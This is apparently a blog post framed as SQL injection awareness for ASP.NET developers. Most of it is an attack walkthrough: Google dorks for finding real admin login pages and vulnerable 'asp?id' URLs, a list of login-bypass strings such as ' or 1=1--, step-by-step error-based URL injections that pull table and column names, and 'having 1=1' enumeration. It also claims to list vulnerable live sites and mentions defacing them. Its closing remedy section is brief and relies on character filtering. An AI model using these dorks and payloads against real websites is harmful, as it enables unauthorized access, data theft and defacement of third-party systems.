Web-Developers are under tight schedule to deliver products on time, thus security aspect of the web-application is often an afterthought and usually delivered later.
Here, I discuss two of the most common WORST practices that ASP.NET developers make and also the remedy to prevent them.
1. Default usernames and passwords (username:admin & password:admin ) in Admin Login portals. (Authentication By-pass in Security Analyst`s Terms)
2. Lack of secure programming.(SQL Injection in SA`s terms)
Now, I would like to share the first part of our discussion.
I just googled by typing the following in the search bar.
I just googled by typing the following in the search bar.
“.in inurl:admin_login.aspx”
“.in inurl:adminlogin.asp”“.in inurl:admin/login.asp”
We can see that there are about one-tenth of million results that are displayed in just no time.
I visited one of the Admin login portal as show below.( I have not mention the complete URL of website to maintain its privacy)
Now, the real magic happens, I entered Username as admin and password as ‘or’0’=’0.(Magic Quote in Security Analyst`s view) And below is the snap of what we can mess with.
A list of such magic quotes can be as following, which you can enter in the password field (to confuse the database).
‘ or ’1'=’1 ‘ or 1=1– hi’ or 1=1 – ‘or’1=1'
‘ or ‘x’='x ‘ or 0=0 – ” or “x”=”x ‘) or (‘x’='x
” or 0=0 – or 0=0 – ” or 1=1-- or 1=1–
‘ or 0=0 # ” or 0=0 # ‘ or a=a– ” or “a”=”a
or 0=0 # ‘ or ‘x’='x ‘) or (‘a’='a “) or (“a”=”a
hi” or “a”=”a hi” or 1=1 – admin password
__________________________________________________________________
LOGIC BEHIND MAGIC QUOTES:
(Why they allows us to login in this manner)
(Why they allows us to login in this manner)
We learnt in our academics the concept of the truth tables i.e. the OR gates AND gates etc. Databases uses the same concept, they just evaluates the true result and gives us access to the secure page. I mean to say that 1 or 1= 1 (that is what we learnt in OR gates) or we can say that true or true=true which in turn evaluates to true result.
___________________________________________________________________
If any of these websites allows us to upload files/malicious scripts on the website then certainly, all the websites which are hosted on such server are also prone to such things. And the process of finding websites hosted on to the same server is called as SERVER ROOTING. Any one can easily gather important information hosted on various websites on the same server and can also DEFACE them.
About 20% of the total websites are found to be insecure in such manner. Even some of the Government Firm`s website are found to be insecure this way.
Below I share some of the vulnerable links that I found and there by I bear no responsibility if some mischief is done by YOU, this is strictly for knowledge purpose.
In fact you can find about hundreds of such sites.
Now, let’s look on the second part of our discussion.
Those ASP websites which looks like www.somewebsite.com/page.asp?id=123 are more prone to the SQL INJECTION . I googled by typing “.in .pak .uk inurl:asp?id” in search bar and found the following result.(off-course you can use any of the google`s dork to search)
Below is the complete process ,
STEPS:
Step:1 find something like id=7 (As shown above using google dork)
Step:2 apply ' (single quote) to the end of the URL to check for error. (If page loads then the site is not vulnerable)
Step:3 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables)) --
Step:4 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('<table_name>','<table_name>'))) --
Step:5 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' ))
http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' and column_name not in('<column_name>','<column_name>')))
Step:6 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 <column_name> from <table_name> )) –
How to find Tables and Columns in a vulnerable website ?
The question arises is that “how will you find the table name?” well I have nice solution for that too.
Follow the steps to know the architecture of the tables and database. We can know the table name and the column name by performing these steps.
Ø To do this, the attacker uses the 'having' clause of the 'select' statement in username field as shown above(Login Portals):
Username: ' having 1=1—
This provokes the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_login.asp, line 35
Ø So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1—
(Which produces the error…)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
Ø Eventually the attacker arrives at the following 'username':
Username: ' group by users.id, users.username, users.password, users.privs having
1=1--
… Which produces no error, and is functionally equivalent to:
select * from users where username = ''
Ø So in this way the attacker now knows that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs', are in that order.
Although the above SQL INJECTION is rare now a days but is still existing.
SNAP:
REMEDY:
1. Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
- Values from cookie
2. For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
1. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
2. Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Recommended References:
Protect from SQL Injection in ASP.NET
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
Great article on gathering information from ODBC error messages:
A good summary of SQL Injection on various SQL Server on:
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
No comments:
Post a Comment